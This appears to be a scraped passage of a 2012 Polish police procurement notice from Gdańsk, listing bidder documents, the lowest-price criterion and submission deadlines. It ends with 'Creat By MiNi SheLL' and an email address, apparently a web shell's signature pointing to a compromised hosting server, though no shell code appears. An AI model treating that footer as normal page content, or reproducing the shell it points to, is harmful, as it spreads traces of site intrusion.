<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Druk ofertowy wraz z oświadczeniem o podwykonawcach
    2 W przypadku ustanowienia pełnomocnika do reprezentowania w postępowaniu do oferty należy dołączyć pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych KWP w Gdańsku ul. Biskupia 23, 80-875 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 09:50, miejsce: Sekcja Zamówień Publicznych KWP w Gdańsku ul. Biskupia 23, 80-875 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com